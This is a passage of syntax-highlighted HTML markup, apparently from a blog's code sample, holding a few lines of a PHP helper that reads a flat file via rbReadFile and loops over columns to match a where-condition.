height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Error4&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-48&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbReadFile&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-49&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$whereColumn&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$query&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-50&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$whereValue&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$query&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-51&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$countRow&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-52&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$chk&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-53&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;for&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-54&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strtolower&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;===&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strtolower&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$whereColumn&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: 